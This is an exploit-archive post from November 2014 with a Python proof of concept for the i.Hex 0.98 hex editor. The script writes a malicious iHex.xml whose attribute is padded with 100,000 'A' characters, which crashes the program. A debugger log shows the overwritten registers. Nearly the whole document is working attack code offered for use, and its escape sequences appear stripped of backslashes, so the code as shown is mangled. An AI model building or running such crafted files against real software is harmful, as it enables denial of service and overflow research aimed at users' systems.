Home / exploits i.Hex 0.98 Local Crash Proof Of Concept
Posted on 07 November 2014
#!/usr/bin/python #Exploit Title:i.Hex Local Crash Poc #Homepage:http://www.memecode.com/ihex.php #Software Link:www.memecode.com/data/ihex-win32-v0.98.exe #Version:i.Hex-v0.98 (Win32 Release) #Description:i.Hex is a small and free graphical Hex Editor for Windows.. #Tested on:Win7 32bit #Exploit Author:metacom --> twitter.com/m3tac0m #Date:05.11.2014 ''' Immunity Debugger Log data EAX 0135B8F8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ECX 41414141 EDX 41414141 EBX 01363FA0 ESP 0012F6D8 EBP 0012F700 ESI 0135B8F0 EDI 005F0000 EIP 77B85FBD ntdll.77B85FBD Press Shift+9 Log data, item 0 Address=77B85B44 Message=[15:56:05] Access violation when reading [41414141] ''' print " [*]Vulnerable Created iHex.xml!" print "[*]Copy iHex.xml to C:Program FilesMemecodei.Hex" print "[*]Start i.Hex" print "[*]------------------------------------------------" poc="x41" * 100000 header = "x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x20x65x6ex63x6fx64x69x6ex67x3dx22" header += "x55x54x46x2dx38x22x20x3fx3ex0ax3cx4fx70x74x69x6fx6ex73x20x49x73x48x65x78x3dx22x31x22x0ax09" header += "x20x4cx69x74x74x6cx65x45x6ex64x69x61x6ex3dx22x0a" + poc footer = "x22x0ax09x20x50x6fx73x3dx22x31x30x30x2cx31x30x30x2cx35x30x30x2cx34x30x30x22x3ex0ax09x3cx4d" footer += "x72x75x20x49x74x65x6dx73x3dx22x30x22x0ax09x09x20x49x74x65x6dx30x3dx22x22x20x2fx3ex0ax3cx2f" footer += "x4fx70x74x69x6fx6ex73x3ex0a" payload= header + footer # Write out our malicious file writeFile = open ("iHex.xml", "wb") writeFile.write( payload ) writeFile.close()
